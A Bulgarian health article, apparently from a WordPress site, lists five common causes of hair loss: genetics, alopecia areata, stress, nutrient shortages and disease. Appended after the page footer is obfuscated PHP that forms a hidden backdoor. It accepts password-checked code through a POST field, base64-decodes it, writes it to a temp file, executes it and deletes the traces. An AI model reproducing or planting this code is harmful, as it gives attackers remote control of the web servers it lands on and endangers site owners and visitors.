5 основни причини за появата на обилен косопад | Косопад

5 основни причини за появата на обилен косопад

kosopad-pri-jeni

Обилният косопад е сериозен проблем за хората, които го имат. За съжаление, тъй като може да има различни причини, няма точна рецепта как да се предпазите от него. Старайте се да разберете какви са причините, които го провокират.

Ето някои от най- разпространените фактори за косопад:

Гените

Косопадът много често е наследствен и се диагностицира като андрогенна алопеция. Има два фактора, които се съчетават: първо, свръхчувствителност към сексуалните хормони, и второ, по- малка концентрация на андрогени в засегнатия скалп. Генетичната информация на нашите клетки обикновено трансформира хормона тестостерон в дехидротестостерон (ДХТ). Хормонът ДХТ скъсява фазата на растеж и така нова коса почти не се появява.

Когато имунната система полудее

Кръговият косопад, известен още като алопеция ареата, е по- рядко срещан, но засяга много хора. Появяват се малки кръгообразни плешиви петна, които се намират обикновено на главата. Според повечето експерти, този вид алопеция се дължи на грешка в имунната система, която се отразява върху космите и тялото се опитва да ги изхвърли.

opleshivqvane-recepti

Косата също страда от стрес

Силният стрес може да ни причини обилен косопад. В случаите на алопеция ареата няма открита пряка връзка между стреса и косопада. В случаите на косопадът, известен като телогенен ефлувиум обаче, е доказано директно въздействие на стреса върху косата.

Косопад заради липса на хранителни вещества

Храната ни осигурява необходимите хранителни вещества, за да сме здрави. Косата също се нуждае от определени вещества, за да е силна и красива. Не само витамините са важни (основно от В групата), но и вещества като аминокиселините, сред които аргинин, глутамин и цистеин. Ако определени от тях липсват, това се отразява под формата на косопад. Липсата на минерали също води до косопад. Най- важните са цинк, селен, желязо, и др.

Косопад като симптом на заболяване

Има редица заболявания, сред чиято симптоматика е косопадът. Затова, е добре да се консултирате със специалист, за да се изключат като вариант.

15. септември 2015 15:58:29 от Надя Колева
Категории: Косопад – Статии | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}